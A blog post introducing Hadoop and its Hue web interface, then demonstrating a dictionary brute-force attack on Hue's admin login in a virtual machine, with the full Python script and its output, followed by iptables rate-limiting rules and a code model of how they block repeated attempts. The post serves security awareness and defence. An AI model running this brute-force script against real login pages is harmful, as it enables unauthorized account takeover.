Showing results for tags 'hue'.
Found 1 result

  1. The term “Big Data” has been flung around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the Internet of Things. All of these things produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was born as an open source project based on the Google File System (GFS) and MapReduce white papers; it was created by Doug Cutting and the open source community. MapReduce is the core of Hadoop, and allows the user to write very simple programs that distribute work across large amounts of data. The Google File System inspired the majority of the work on the open source Hadoop Distributed File System (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines, where it can be analyzed using MapReduce programs. That is just a brief dive into what Hadoop is; if you want to learn more, I highly recommend you take a gander at the Yahoo Hadoop tutorial.

Around Hadoop sits an ecosystem of projects that make managing this complex monster easier on administrators and developers. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives the user a web interface for querying their data through some of the projects that live in this big data ecosystem, such as:

    Hive
    Pig
    Oozie
    Impala

Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer-generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being: Hue has access to some seriously valuable information. As with most technologies, security is often an afterthought.

It is important that we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell that information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason I have picked Hue as an example for a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Let’s crack some Hue accounts! Of course, in this article I’m using a virtual machine and not testing on live systems in the wild. That would be highly unethical, but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks, much like children’s stories about being good or the boogie man will get you.

So, I decided to test the limits and see how easy it would be to crack into a Hue account using old-school brute-forcing. As a standard bad practice, people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account?

    ~$ ./hute.py
    ....
    ....
    ....
    ....
    ....
    ....
    ....
    ....
    ....
    ....
    ....
    Success! admin:admin
    Completed attack at 2014-09-30 16:19:55.113608

Here is the source code for those who care and would like to test their own systems using the same method as this proof of concept.

    #!/usr/bin/python
    import sys
    import os
    import requests
    import datetime
    from fake_useragent import UserAgent

    ## CONFIG STARTS HERE ##
    user = "admin"
    host = "hostname:port"
    listfile = "~/dictionaries/top1000-worst-passwords.txt"
    ## CONFIG ENDS HERE ##

    # open() does not expand a leading "~" by itself
    dictionary = open(os.path.expanduser(listfile))
    lines = dictionary.readlines()
    words = []
    print "Initializing dictionary",
    for entry in lines:
        print('.'),
        newword = entry.rstrip("\n")
        words.append(newword)
    print "Now testing "
    for password in words:
        # a random User-Agent for every request
        ua = UserAgent().random
        headers = {"User-Agent": ua}
        post = {"username": user, "password": password}
        r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
        # the Hue login page echoes "Invalid" on a failed attempt
        invalid = r.text.find("Invalid")
        if invalid == -1:
            print "\nSuccess! " + user + ":" + password
            print "Completed test at ",
            print datetime.datetime.now()
            sys.exit()
        else:
            print "...."
    print "Attack unsuccessful...Completed at ",
    print datetime.datetime.now()

What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two-factor auth within Django. What we can do is protect Hue with some iptables magic. We can use the iptables recent module to keep an eye out for shady traffic and to act on that traffic:

    $ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP
    ~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set

Because both commands insert at the top of the INPUT chain, the --set rule ends up first and records every new connection to port 8888 in the hue-firewall list; the --update rule below it then drops a source’s new connections once that source has hit the threshold of 10 new connections within 30 seconds, thus thwarting any effective brute-force attempt. It is not foolproof, but it is definitely going to put a dent in most brute-force attacks on Hue. The point of this article is not to shame Hue by any means, but to shine a light on security in this emerging space. Unfortunately the issue of brute force is an age-old concern.
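To show how those two iptables rules behave against a burst of login attempts, here is an added model of the xt_recent --set/--update logic with the article’s parameters (30 seconds, hit count 10, port 8888). This is illustrative code written for this edit, not part of the original post, of Hue, or of iptables; the IP addresses and timings are constructed.

```python
from collections import defaultdict, deque

SECONDS = 30        # --seconds 30
HITCOUNT = 10       # --hitcount 10
PKT_LIST_TOT = 20   # xt_recent default ip_pkt_list_tot: stamps kept per source

class RecentTable:
    """Per-source packet timestamps, as the kernel's 'recent' list keeps them."""
    def __init__(self):
        self.stamps = defaultdict(lambda: deque(maxlen=PKT_LIST_TOT))

    def set(self, src, now):
        # '--set': always matches and records this packet's time for src
        self.stamps[src].append(now)

    def update(self, src, now, seconds=SECONDS, hitcount=HITCOUNT):
        # '--update --seconds S --hitcount N': matches when at least N stamps
        # fall within the last S seconds; a match also records a fresh stamp,
        # so a source that keeps hammering keeps extending its own block.
        if src not in self.stamps:
            return False
        hits = sum(1 for t in self.stamps[src] if now - t <= seconds)
        if hits >= hitcount:
            self.stamps[src].append(now)
            return True
        return False

def filter_new_connections(events):
    """events: (time_in_seconds, src_ip) per NEW TCP connection to port 8888.
    Returns 'ACCEPT' or 'DROP' for each event, in order.  The --set rule is
    evaluated first because it was inserted (-I INPUT) last, so it sits above
    the --update/DROP rule in the chain."""
    table = RecentTable()
    verdicts = []
    for now, src in events:
        table.set(src, now)
        verdicts.append("DROP" if table.update(src, now) else "ACCEPT")
    return verdicts

# Constructed sample (not real traffic): 198.51.100.7 fires 12 login attempts one
# second apart, 203.0.113.9 makes a single attempt in the middle, and the first
# source comes back after more than 30 seconds of quiet.
SAMPLE = sorted([(t, "198.51.100.7") for t in range(12)]
                + [(5.5, "203.0.113.9"), (75, "198.51.100.7")])

if __name__ == "__main__":
    for (t, src), verdict in zip(SAMPLE, filter_new_connections(SAMPLE)):
        print("t=%5.1fs  %-13s %s" % (t, src, verdict))
```

The run shows the tenth attempt within the window and everything after it being dropped while the other source is untouched, and the same source being accepted again once 30 seconds have passed without hits.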
Developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle the blame around all we want, but it takes only a few lines of code to save users from hanging themselves, and that is the developer’s job. These security lessons have been learned time and time again.

Source